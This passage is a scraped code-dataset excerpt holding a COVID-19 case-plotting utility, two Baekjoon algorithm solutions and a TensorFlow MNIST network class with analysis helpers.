consistency checks passed', \n 'initial_validation')\n \n return True\n\n\ndef latest_date_state_level(dfs, pop):\n ''' Create summary table for latest available date.'''\n \n # population: create state-level summary (not state + county)\n state_pop = pop.sum(level='Province_State')\n\n # covid confirmed cases + deaths (latest available date)\n ts = list()\n for category in dfs.keys():\n cases = dfs[category].iloc[-1].sum(level='Province_State').rename(category)\n ts.append(cases)\n \n per_100k = cases.div(state_pop).mul(100_000).rename(category + ' per 100k')\n ts.append(per_100k)\n\n ts.append(state_pop)\n \n # several pandas series => one dataframe\n frame = pd.concat(ts, axis=1)\n\n frame['as_of_date'] = dfs[category].index.max()\n\n # exclude the two cruise ships\n mask = frame.index.isin({'Diamond Princess', 'Grand Princess'})\n frame = frame[~ mask]\n\n return frame\n\n\n\nstate_name_to_code = {\n 'California': 'CA',\n 'Connecticut': 'CT',\n 'Florida': 'FL',\n 'Illinois': 'IL',\n 'Louisiana': 'LA',\n 'Maryland': 'MA',\n 'Massachusetts': 'MA',\n 'Michigan': 'MI',\n 'New Jersey': 'NJ',\n 'New York': 'NY',\n 'Pennsylvania': 'PA',\n 'Texas': 'TX',\n}\n\n\n\ndef plot_count_vs_rate(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n x = category\n y = f'{category} per 100k'\n \n ax.scatter(data[x].values, data[y].values, alpha=0.5)\n\n ax.set(xlabel = x.title(),\n ylabel = y.title(),\n title = f'Number of {x.title()} vs. 
Number of {y.title()} as of {as_of}',\n )\n \n # add annotation for top 10 items\n for state in data[x].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n return fig, ax\n\n\ndef plot_confirmed_vs_deaths(data):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n \n as_of = data['as_of_date'].iloc[0].strftime('%Y-%m-%d')\n\n mask = data['deaths'] >= 10\n\n ax.scatter(data.loc[mask, 'confirmed'].values,\n data.loc[mask, 'deaths'].values,\n alpha=0.5)\n\n ax.set(xlabel='Number of Confirmed Cases',\n ylabel='Number of Deaths',\n xscale='log',\n yscale='log',\n title=f'Number of Confirmed Cases vs Number of Deaths as of {as_of}',\n )\n\n ax.annotate('for states reporting\\n10 or more deaths',\n xy=(1, 0),\n xycoords='axes fraction',\n xytext=(-20, 20),\n textcoords='offset pixels',\n horizontalalignment='right',\n verticalalignment='bottom',\n )\n \n # add annotation for top 10 items\n x = 'confirmed'\n y = 'deaths'\n \n for state in data[y].sort_values(ascending=False).index[0:10]:\n state_x = data.at[state, x]\n state_y = data.at[state, y]\n\n ax.annotate(state_name_to_code.get(state, state),\n xy=(state_x, state_y),\n xycoords='data',\n xytext=(5, 0),\n textcoords='offset points',\n #arrowprops=dict(facecolor='black', shrink=0.05),\n horizontalalignment='left',\n verticalalignment='center')\n\n \n return fig, ax\n\n\ndef plot_observations_vs_date(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = data[category].sum(axis=1, level='Province_State').loc[:, state].loc[lambda x: x >= 10]\n ax.plot(t, label=state)\n\n ax.set(xlabel='Date',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n\n return fig, ax\n\ndef plot_observations_vs_days(data, category):\n\n fig, ax = plt.subplots(figsize=(10, 6))\n\n top_10_states = (data[category]\n .sum(axis=1, level='Province_State')\n .iloc[-1]\n .sort_values(ascending=False)\n .index[0:10]\n )\n\n for state in top_10_states:\n t = (data[category]\n .sum(axis=1, level='Province_State')\n .loc[:, state]\n .loc[lambda x: x >= 10]\n .reset_index(drop=True)\n )\n ax.plot(t, label=state)\n\n ax.set(xlabel=f'Days since 10th {category.title()}',\n ylabel=f'Number of {category.title()}',\n yscale='log',\n title=f'Number of {category.title()}'\n )\n\n ax.legend()\n\n return fig, ax\n\n# counties in Southern California (So Cal)\nso_cal_counties = [\n 'Imperial',\n 'Kern',\n 'Los Angeles',\n 'Orange',\n 'Riverside',\n 'San Bernardino',\n 'San Diego',\n 'San Luis Obispo',\n 'Santa Barbara',\n 'Ventura',\n ]\n\ndef drop_level_inline(df):\n t = df.copy()\n t.columns = t.columns.droplevel(0)\n return t\n\ndef confirmed_cases_so_cal(data, category):\n fig, ax = plt.subplots(figsize=(10, 6))\n\n t = (data[category]\n .loc[:, ('California', so_cal_counties)]\n .pipe(drop_level_inline)\n )\n\n for county in t.columns:\n ax.plot(t[county].loc[lambda x: x >= 10], label=county)\n\n 
ax.set(xlabel='date',\n ylabel='# of Confirmed Cases',\n yscale='log',\n title='Confirmed Cases in Southern California',\n )\n\n ax.get_xaxis().set_major_locator(mdates.DayLocator(interval=14))\n ax.get_xaxis().set_major_formatter(mdates.DateFormatter('%b %d'))\n\n ax.legend()\n \n return fig, ax\n","repo_name":"jeffrey-smart/covid-19","sub_path":"src/covid_util.py","file_name":"covid_util.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28666138428","text":"a,b,c = map(int, input().split())\n\nif b >= c:\n print(-1)\n exit()\n\nn = (a // (c -b)) + 1\nprint(n) \n\n\n# 손익분기점\n# 고정비용 A만원\n# 노트북 1대 생산 가변비용 B만원\n# 노트북 가격 C만원\n\n# 총 비용 = A + (B * n)\n# 이익 = C * n\n\n# https://www.acmicpc.net/problem/1712","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/08_math_1/P01_1712.py","file_name":"P01_1712.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30691845521","text":"import sys\ninput = sys.stdin.readline\nfrom collections import deque\n\nt = int(input())\nfor c in range(t) : \n start, end = map(int, input().split())\n isVisit = [False] * 10000\n isVisit[start] = True\n path = [\"\"] * 10000\n q = deque()\n q.append(start)\n\n while q : \n tmp = q.popleft()\n\n # D *2\n op = (tmp*2) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] = path[tmp] + 'D'\n isVisit[op] = True\n\n # S -1\n op = (tmp-1) % 10000\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'S'\n isVisit[op] = True\n\n # L <1\n op = (tmp % 1000) * 10 + tmp // 1000\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'L'\n isVisit[op] = True\n \n # R >1\n op = (tmp % 10) * 1000 + tmp // 10\n\n if not isVisit[op] :\n q.append(op)\n path[op] += path[tmp] + 'R'\n isVisit[op] = True\n\n print(path[end])","repo_name":"SuperH0ng/algorithm","sub_path":"따로 푼 것/백준/백준 9019번(DSLR).py","file_name":"백준 9019번(DSLR).py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13401717381","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.metrics import confusion_matrix\nimport time\nfrom datetime import timedelta\nimport math\nimport scipy.ndimage\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nclass network(object):\n def __init__(self):\n tf.reset_default_graph()\n self.test_batch_size = 256\n self.train_batch_size = 64\n self.total_iterations = 0\n\n def setup(self,load = None, structure=None,end_relu = False,end_biases = False, data = None, offset = 0, scale = 1):\n \"\"\"\n Creates a network\n load: the filepath of the network to load (must be compatible with \"structure\"), if none then a new network will be created\n structure: an array determining the type of network and the hidden structure of the network. The array has the shape:\n [size of filters/number of nodes, number of filters/MLP, use pooling/use_relu, use biases];\n If the second input is <=0 then the network will be a MPL, else it will be a ConvNet.\n the last two inputs get converted to boolean from 1 or 0; they determine if the layer has biases and pooling/ReLUs on the layer. (convnets always use ReLUs). 
There is a fully connected layer added by default at the end of the network, this should not be in the structure array.\n end_relu: determines if the final layer has a ReLU;\n end_biases: determines if the final layer has biases;\n data: none defaults to the MNIST dataset from the Tensorflow examples folder, but others can be used (supplying the MNIST dataset is quicker if it is already loaded);\n offset: puts an offset on all images coming into the network e.g -0.5 will make all MNIST images between -0.5 and 0.5 instead of 0 to 1\n scale: scales the input image by any value, applies before offset\n \n \"\"\"\n self.scale = scale\n self.offset = offset\n self.structure = structure\n self.data = data\n if (self.data is None):\n self.data = input_data.read_data_sets('data/MNIST/', one_hot=True)\n\n # We know that MNIST images are 28 pixels in each dimension.\n self.img_size = 28\n # Images are stored in one-dimensional arrays of this length.\n self.img_size_flat = self.img_size * self.img_size\n # Tuple with height and width of images used to reshape arrays.\n self.img_shape = (self.img_size, self.img_size)\n # Number of colour channels for the images: 1 channel for gray-scale.\n self.num_channels = 1\n # Number of classes, one class for each of 10 digits.\n self.num_classes = 10\n\n self.x = tf.placeholder(tf.float32, shape=[None, self.img_size_flat], name='x')\n self.scale_layer = tf.multiply(self.x,self.scale)\n self.offset_layer = tf.add(self.scale_layer,self.offset)\n self.x_image = tf.reshape(self.offset_layer, [-1, self.img_size, self.img_size, self.num_channels])\n self.y_true = tf.placeholder(tf.float32, shape=[None, self.num_classes], name='y_true')\n self.y_true_cls = tf.argmax(self.y_true, axis=1)\n\n self.layers = [tf.Tensor for i in range(self.structure.shape[0]+1)]\n self.weights = [tf.Variable for i in range(self.structure.shape[0]+1)]\n self.biases = [tf.Variable for i in range(self.structure.shape[0]+1)]\n\n i=0;\n while (i<self.structure.shape[0]):\n self.filter_size = self.structure[i,0]\n self.num_filters = self.structure[i,1]\n self.use_pooling = bool(self.structure[i,2])\n self.use_biases = bool(self.structure[i,3])\n if (self.num_filters>0):\n if (i==0):\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.x_image,\n num_input_channels=self.num_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n else:\n self.num_input_channels = self.structure[i-1,1]\n self.layers[i],self.weights[i],self.biases[i] =\\\n self.new_conv_layer(input=self.layers[i-1],\n num_input_channels=self.num_input_channels,\n filter_size=self.filter_size,\n num_filters=self.num_filters,\n use_pooling=self.use_pooling,\n use_biases =self.use_biases)\n i=i+1\n\n else:\n if (i==0):\n self.layer_flat, self.num_features = self.flatten_layer(self.x_image)\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layer_flat,\n num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n else:\n if(self.structure[i-1,1]>0):\n self.image_flat, self.num_pixels = self.flatten_layer(self.layers[i-1])\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.image_flat,\n num_inputs=self.num_pixels,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n\n else:\n self.layers[i],self.weights[i],self.biases[i] = self.new_fc_layer(input=self.layers[i-1],\n 
num_inputs=self.num_features,\n num_outputs=self.filter_size,\n use_relu=self.use_pooling,\n use_biases =self.use_biases)\n self.num_features = self.filter_size\n i=i+1\n\n if(self.structure[i-1,1]>0):\n self.layer_last,self.num_features = self.flatten_layer(self.layers[i-1])\n else:\n self.layer_last = self.layers[i-1]\n\n self.layers[i],self.weights[i],self.biases[i]= self.new_fc_layer(input=self.layer_last,\n num_inputs=self.num_features,\n num_outputs=self.num_classes,\n use_relu=end_relu,\n use_biases = end_biases)\n\n self.y_pred = tf.nn.softmax(self.layers[i])\n\n self.y_pred_cls = tf.argmax(self.y_pred, axis=1)\n\n self.cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=self.layers[i],\n labels=self.y_true)\n self.cost = tf.reduce_mean(self.cross_entropy)\n self.optimizer = tf.train.AdamOptimizer(learning_rate=1e-4).minimize(self.cost)\n self.correct_prediction = tf.equal(self.y_pred_cls, self.y_true_cls)\n self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, tf.float32))\n\n self.session = tf.Session()\n self.session.run(tf.global_variables_initializer())\n\n if (load is not None):\n if load==\"default\":\n load =\"./Models/MNIST_model\"\n self.session = tf.Session()\n self.saver = tf.train.Saver()\n self.saver.restore(self.session,load)\n\n def save(self,location = \"./Models/MNIST_model\"):\n \"\"\"\n saves the network at the given file path, defaults to \"./Models/MNIST_model\".\n \"\"\"\n self.saver = tf.train.Saver()\n self.saver.save(self.session, location)\n\n def plot_images(self,images, cls_true, cls_pred=None):\n \"\"\"\n plots 9 supplied images in a 3x3 grid, together with the true and predicted class labels. \n \"\"\"\n assert len(images) == len(cls_true) == 9\n\n # Create figure with 3x3 sub-plots.\n fig, axes = plt.subplots(3, 3)\n fig.subplots_adjust(hspace=0.3, wspace=0.3)\n\n for i, ax in enumerate(axes.flat):\n # Plot image.\n ax.imshow(images[i].reshape(self.img_shape), cmap='binary')\n\n # Show true and predicted classes.\n if self.cls_pred is None:\n xlabel = \"True: {0}\".format(self.cls_true[i])\n else:\n xlabel = \"True: {0}, Pred: {1}\".format(self.cls_true[i], self.cls_pred[i])\n\n # Show the classes as the label on the x-axis.\n ax.set_xlabel(xlabel)\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def new_weights(self,shape):\n return tf.Variable(tf.truncated_normal(shape, stddev=0.05))\n\n def new_biases(self,length):\n return tf.Variable(tf.constant(0.05, shape=[length]))\n\n def new_conv_layer(self,\n input, # The previous layer.\n num_input_channels, # Num. channels in prev. layer.\n filter_size, # Width and height of each filter.\n num_filters, # Number of filters.\n use_pooling=True,\n use_biases =True\n ):\n\n # Shape of the filter-weights for the convolution.\n # This format is determined by the TensorFlow API.\n shape = [filter_size, filter_size, num_input_channels, num_filters]\n\n # Create new weights aka. filters with the given shape.\n weights = self.new_weights(shape=shape)\n\n if(use_biases):\n # Create new biases, one for each filter.\n biases = self.new_biases(length=num_filters)\n else:\n biases = []\n\n # Create the TensorFlow operation for convolution.\n # Note the strides are set to 1 in all dimensions.\n # The first and last stride must always be 1,\n # because the first is for the image-number and\n # the last is for the input-channel.\n # But e.g. 
strides=[1, 2, 2, 1] would mean that the filter\n # is moved 2 pixels across the x- and y-axis of the image.\n # The padding is set to 'SAME' which means the input image\n # is padded with zeroes so the size of the output is the same.\n layer = tf.nn.conv2d(input=input,\n filter=weights,\n strides=[1, 1, 1, 1],\n padding='SAME')\n\n # Add the biases to the results of the convolution.\n # A bias-value is added to each filter-channel.\n if(use_biases):\n layer += biases\n\n # Use pooling to down-sample the image resolution?\n if use_pooling:\n # This is 2x2 max-pooling, which means that we\n # consider 2x2 windows and select the largest value\n # in each window. Then we move 2 pixels to the next window.\n layer = tf.nn.max_pool(value=layer,\n ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1],\n padding='SAME')\n\n # Rectified Linear Unit (ReLU).\n # It calculates max(x, 0) for each input pixel x.\n # This adds some non-linearity to the formula and allows us\n # to learn more complicated functions.\n layer = tf.nn.relu(layer)\n\n # Note that ReLU is normally executed before the pooling,\n # but since relu(max_pool(x)) == max_pool(relu(x)) we can\n # save 75% of the relu-operations by max-pooling first.\n\n # We return both the resulting layer and the filter-weights\n # because we will plot the weights later.\n return layer, weights, biases\n\n def flatten_layer(self,layer):\n # Get the shape of the input layer.\n layer_shape = layer.get_shape()\n\n # The shape of the input layer is assumed to be:\n # layer_shape == [num_images, img_height, img_width, num_channels]\n\n # The number of features is: img_height * img_width * num_channels\n # We can use a function from TensorFlow to calculate this.\n num_features = layer_shape[1:4].num_elements()\n\n # Reshape the layer to [num_images, num_features].\n # Note that we just set the size of the second dimension\n # to num_features and the size of the first dimension to -1\n # which means the size in that dimension is calculated\n # so the total size of the tensor is unchanged from the reshaping.\n layer_flat = tf.reshape(layer, [-1, num_features])\n\n # The shape of the flattened layer is now:\n # [num_images, img_height * img_width * num_channels]\n\n # Return both the flattened layer and the number of features.\n return layer_flat, num_features\n\n def new_fc_layer(self,input, # The previous layer.\n num_inputs, # Num. inputs from prev. layer.\n num_outputs, # Num. 
outputs.\n use_relu=True,\n use_biases = True): # Use Rectified Linear Unit (ReLU)?\n\n # Create new weights and biases.\n weights = self.new_weights(shape=[num_inputs, num_outputs])\n if (use_biases):\n biases = self.new_biases(length=num_outputs)\n else:\n biases =[]\n # Calculate the layer as the matrix multiplication of\n # the input and weights, and then add the bias-values.\n if (use_biases):\n layer = tf.matmul(input, weights) + biases\n else:\n layer = tf.matmul(input, weights)\n # Use ReLU?\n if use_relu:\n layer = tf.nn.relu(layer)\n\n return layer,weights,biases\n\n def optimize(self,num_iterations):\n\n # Start-time used for printing time-usage below.\n start_time = time.time()\n\n for i in range(self.total_iterations,\n self.total_iterations + num_iterations):\n\n # Get a batch of training examples.\n # x_batch now holds a batch of images and\n # y_true_batch are the true labels for those images.\n x_batch, y_true_batch = self.data.train.next_batch(self.train_batch_size)\n\n # Put the batch into a dict with the proper names\n # for placeholder variables in the TensorFlow graph.\n feed_dict_train = {self.x: x_batch,\n self.y_true: y_true_batch}\n\n # Run the optimizer using this batch of training data.\n # TensorFlow assigns the variables in feed_dict_train\n # to the placeholder variables and then runs the optimizer.\n self.session.run(self.optimizer, feed_dict=feed_dict_train)\n\n # Print status every 100 iterations.\n if i % 100 == 0:\n # Calculate the accuracy on the training-set.\n acc = self.session.run(self.accuracy, feed_dict=feed_dict_train)\n\n # Message for printing.\n msg = \"Optimization Iteration: {0:>6}, Training Accuracy: {1:>6.1%}\"\n\n # Print it.\n print(msg.format(i + 1, acc))\n\n # Update the total number of iterations performed.\n self.total_iterations += num_iterations\n\n # Ending time.\n end_time = time.time()\n\n # Difference between start and end-times.\n time_dif = end_time - start_time\n\n # Print the time-usage.\n print(\"Time usage: \" + str(timedelta(seconds=int(round(time_dif)))))\n\n def plot_example_errors(self,cls_pred, correct):\n # This function is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # correct is a boolean array whether the predicted class\n # is equal to the true class for each image in the test-set.\n\n # Negate the boolean array.\n incorrect = (correct == False)\n\n # Get the images from the test-set that have been\n # incorrectly classified.\n images = self.data.test.images[incorrect]\n\n # Get the predicted classes for those images.\n cls_pred = cls_pred[incorrect]\n\n # Get the true classes for those images.\n cls_true = self.data.test.cls[incorrect]\n\n # Plot the first 9 images.\n plot_images(images=images[0:9],\n cls_true=cls_true[0:9],\n cls_pred=cls_pred[0:9])\n\n def plot_confusion_matrix(self,cls_pred):\n # This is called from print_test_accuracy() below.\n\n # cls_pred is an array of the predicted class-number for\n # all images in the test-set.\n\n # Get the true classifications for the test-set.\n cls_true = self.data.test.cls\n\n # Get the confusion matrix using sklearn.\n cm = confusion_matrix(y_true=cls_true,\n y_pred=cls_pred)\n\n # Print the confusion matrix as text.\n print(cm)\n\n # Plot the confusion matrix as an image.\n plt.matshow(cm)\n\n # Make various adjustments to the plot.\n plt.colorbar()\n tick_marks = np.arange(self.num_classes)\n plt.xticks(tick_marks, range(self.num_classes))\n plt.yticks(tick_marks, 
range(self.num_classes))\n plt.xlabel('Predicted')\n plt.ylabel('True')\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n # Split the test-set into smaller batches of this size.\n\n def print_test_accuracy(self,show_example_errors=False,\n show_confusion_matrix=False):\n # Number of images in the test-set.\n num_test = len(self.data.test.images)\n\n # Allocate an array for the predicted classes which\n # will be calculated in batches and filled into this array.\n cls_pred = np.zeros(shape=num_test, dtype=np.int)\n\n # Now calculate the predicted classes for the batches.\n # We will just iterate through all the batches.\n # There might be a more clever and Pythonic way of doing this.\n\n # The starting index for the next batch is denoted i.\n i = 0\n\n while i < num_test:\n # The ending index for the next batch is denoted j.\n j = min(i + self.test_batch_size, num_test)\n\n # Get the images from the test-set between index i and j.\n images = self.data.test.images[i:j, :]\n\n # Get the associated labels.\n labels = self.data.test.labels[i:j, :]\n\n # Create a feed-dict with these images and labels.\n feed_dict = {self.x: images,\n self.y_true: labels}\n\n # Calculate the predicted class using TensorFlow.\n cls_pred[i:j] = self.session.run(y_pred_cls, feed_dict=feed_dict)\n\n # Set the start-index for the next batch to the\n # end-index of the current batch.\n i = j\n\n # Convenience variable for the true class-numbers of the test-set.\n cls_true = self.data.test.cls\n\n # Create a boolean array whether each image is correctly classified.\n correct = (cls_true == cls_pred)\n\n # Calculate the number of correctly classified images.\n # When summing a boolean array, False means 0 and True means 1.\n correct_sum = correct.sum()\n\n # Classification accuracy is the number of correctly classified\n # images divided by the total number of images in the test-set.\n acc = float(correct_sum) / num_test\n\n # Print the accuracy.\n msg = \"Accuracy on Test-Set: {0:.1%} ({1} / {2})\"\n print(msg.format(acc, correct_sum, num_test))\n\n # Plot some examples of mis-classifications, if desired.\n if show_example_errors:\n print(\"Example errors:\")\n plot_example_errors(cls_pred=cls_pred, correct=correct)\n\n # Plot the confusion matrix, if desired.\n if show_confusion_matrix:\n print(\"Confusion Matrix:\")\n plot_confusion_matrix(cls_pred=cls_pred)\n\n def plot_conv_weights(self,weights, input_channel=0):\n # Assume weights are TensorFlow ops for 4-dim variables\n # e.g. weights_conv1 or weights_conv2.\n\n # Retrieve the values of the weight-variables from TensorFlow.\n # A feed-dict is not necessary because nothing is calculated.\n w = self.session.run(weights)\n\n # Get the lowest and highest values for the weights.\n # This is used to correct the colour intensity across\n # the images so they can be compared with each other.\n w_min = np.min(w)\n w_max = np.max(w)\n\n # Number of filters used in the conv. 
layer.\n num_filters = w.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot all the filter-weights.\n for i, ax in enumerate(axes.flat):\n # Only plot the valid filter-weights.\n if i<num_filters:\n # Get the weights for the i'th filter of the input channel.\n # See new_conv_layer() for details on the format\n # of this 4-dim tensor.\n img = w[:, :, input_channel, i]\n\n # Plot image.\n ax.imshow(img, vmin=w_min, vmax=w_max,\n interpolation='nearest', cmap='seismic')\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_conv_layer(self,layer, image):\n # Assume layer is a TensorFlow op that outputs a 4-dim tensor\n # which is the output of a convolutional layer,\n # e.g. layer_conv1 or layer_conv2.\n\n # Create a feed-dict containing just one image.\n # Note that we don't need to feed y_true because it is\n # not used in this calculation.\n feed_dict = {self.x: [image]}\n\n # Calculate and retrieve the output values of the layer\n # when inputting that image.\n values = self.session.run(layer, feed_dict=feed_dict)\n\n # Number of filters used in the conv. layer.\n num_filters = values.shape[3]\n\n # Number of grids to plot.\n # Rounded-up, square-root of the number of filters.\n num_grids = math.ceil(math.sqrt(num_filters))\n\n # Create figure with a grid of sub-plots.\n fig, axes = plt.subplots(num_grids, num_grids)\n\n # Plot the output images of all the filters.\n for i, ax in enumerate(axes.flat):\n # Only plot the images for valid filters.\n if i<num_filters:\n # Get the output image of using the i'th filter.\n # See new_conv_layer() for details on the format\n # of this 4-dim tensor.\n img = values[0, :, :, i]\n\n # Plot image.\n ax.imshow(img, interpolation='nearest', cmap='binary')\n\n # Remove ticks from the plot.\n ax.set_xticks([])\n ax.set_yticks([])\n\n # Ensure the plot is shown correctly with multiple plots\n # in a single Notebook cell.\n plt.show()\n\n def plot_image(self,image):\n plt.imshow(np.multiply(image.reshape(self.img_shape),self.scale)+self.offset,\n interpolation='nearest',\n cmap='binary')\n\n plt.show()\n\n def average_output(self,layer, image,suppress_out = False):\n \"\"\"\n layer: needs to be a tensorflow object, e.g net.layer[0]\n suppress_out determines if the image produced is displayed or not (bool)\n returns the average of a given layer’s outputs for a given image.\n \"\"\"\n\n # Create a feed-dict containing just one image.\n # Note that we don't need to feed y_true because it is\n # not used in this calculation.\n feed_dict = {self.x: [image]}\n\n # Calculate and retrieve the output values of the layer\n # when inputting that image.\n values = self.session.run(layer, feed_dict=feed_dict)\n\n # Number of filters used in the conv. 
layer.\n num_filters = values.shape[3]\n\n img = values[0, :, :, 0]\n\n i=1\n if i<num_filters:\n # Get the output image of using the i'th filter.\n # See new_conv_layer() for details on the format\n # of this 4-dim tensor.\n img = img + values[0, :, :, i]\n\n if suppress_out==False:\n img = img/num_filters\n plt.imshow(img) \n plt.show()\n \n return img\n\n\n def give_prob(self,image,layer = None):\n \"\"\"\n gives the network output at a given layer (default is final)\n \"\"\"\n if(layer is None):\n output = self.y_pred\n else:\n output = self.layers[layer]\n\n img_shape=self.img_shape\n if image.ndim == 4:\n pre_class = np.zeros([image.shape[0],10])\n for i in range(0,image.shape[0]):\n im = image[i,:,:,0].reshape(img_shape[0]*img_shape[1])\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n pre_class[i,:] = self.session.run([output], feed_dict=feed_dict)[0]\n return pre_class\n elif image.ndim==3:\n im = image[:,:,0].reshape(img_shape[0]*img_shape[1])\n elif image.ndim==2:\n im = image[:,:].reshape(img_shape[0]*img_shape[1])\n\n elif image.ndim==1:\n im = image\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n #y_true is unknown for this image so the vector can be anything\n # Calculate the predicted class using TensorFlow.\n return self.session.run([output], feed_dict=feed_dict)[0]\n\n def give_class(self,image):\n img_shape=self.img_shape\n if image.ndim == 4:\n pre_class = np.zeros([image.shape[0],10])\n for i in range(0,image.shape[0]):\n im = image[i,:,:,0].reshape(img_shape[0]*img_shape[1])\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n pre_class[i,:] = self.session.run([self.y_pred], feed_dict=feed_dict)[0]\n return pre_class\n elif image.ndim==3:\n im = image[:,:,0].reshape(img_shape[0]*img_shape[1])\n elif image.ndim==2:\n im = image[:,:].reshape(img_shape[0]*img_shape[1])\n\n elif image.ndim==1:\n im = image\n feed_dict = {self.x: [im],\n self.y_true: [[-1,-1,-1,-1,-1,-1,-1,-1,-1,-1]]}\n #y_true is unknown for this image so the vector can be anything\n # Calculate the predicted class using TensorFlow.\n return self.session.run([self.y_pred_cls], feed_dict=feed_dict)[0][0]\n\n def find_plane(self,x,Weights=None,Biases = None,node=None,layer=None):\n \"\"\"\n This function finds the W,B and y for which xW+B = y.\n When specified this is done only for the \"node\" at depth \"layer\" of the network.\n Else it is done for all nodes in the final layer.\n outputs W,B,y\n\n x is the input being analyised as a numpy array (flattened or not)\n weights is a python list containing the weight matrices for each layer [layer0_weights, layer1_weights....]\n biases is a python list containing the bias vectors for each layer[layer0_biases, layer1_biases....]\n node is either None, int or list with 2 elements.\n When None the weight output will have shape (output size) and the pias will have size (output size)\n if node is an int, it is the node in the final layer for which the decision plane is being sought,\n hence the shapes will be: (input size)x1 and 1, respectivly\n if node is a 2 element list the decision plane will be the boundary between element 0 and element 1 in the list\n this can be faster than generating new lists\n layer is either None, an int or a list length 2\n when layer is None the whole network is analysed and the node arguament applies to the final layer\n when layer is an int the network only up to that layer will be analysed and node applies to that layer.\n When layer is a list 
length 2 it gives the begin and end layer to analyse - in this case x should be the input to the smaller numbered layer.\n this can be faster than generating new lists\n\n the network structure is: x = Y0:\n Y0 R0 W0 + B0=Y1\n Y1 R1 W1 + B1 = Y2\n ...\n\n Note the ReLU step is on the input not the output, the node and layer are with reference to Y (hence layer cannot be 0).\n \"\"\"\n\n #check valid layer to investigate\n nlayersmin=0\n if layer is not None:\n if np.isscalar(layer):\n nlayers = layer\n elif len(layer) == 2:\n nlayersmin = min(layer)\n nlayers = max(layer)\n else:\n raise ValueError('layer length/type incorrect')\n\n else:\n if Weights is None:\n if Biases is None:\n nlayers = len(self.layers)\n else:\n nlayers=len(Biases)\n else:\n if Biases is None:\n nlayers=len(Weights)\n else:\n nlayers=min(len(Weights),len(Biases))\n if len(Weights)!=len(Biases):\n raise ValueError('Weight and Bias arrays must be the same length')\n\n if Weights is None:\n weights = []\n for L in range (nlayersmin,nlayers):\n weights.append(self.session.run(self.weights[L]).copy())\n else:\n weights = Weights.copy()\n\n if Biases is None:\n biases = []\n for L in range (nlayersmin,nlayers):\n biases.append(self.session.run(self.biases[L]).copy())\n else:\n biases = Biases.copy()\n\n\n #focus on the specified node.\n if node is not None:\n if np.isscalar(node):\n weights[-1] =np.array(weights[-1][:,node])\n biases[-1] = np.array([biases[-1][node]])\n elif len(node) == 2:\n weights[-1] =np.array(weights[-1][:,node[0]]-weights[-1][:,node[1]])\n biases[-1] = np.array([biases[-1][node[0]]-biases[-1][node[1]]])\n else:\n raise ValueError('node argument of improper type/length')\n\n #begin by creating ReLU matrices\n y = np.multiply(x.flatten(),self.scale)+self.offset\n R = [np.identity(x.size)]\n for L in range (0,nlayers-nlayersmin):\n y = y.dot(R[L]).dot(weights[L])+biases[L]\n r = (1.0*(y>=0))\n R.append(np.diag(r))\n\n #combine the weights, bias and ReLU matrices to produce W and B matrices\n W = 1\n Btemp = biases.copy()\n for L in range (0,nlayers-nlayersmin):\n #print(W.shape)\n Btemp[-1-L] = 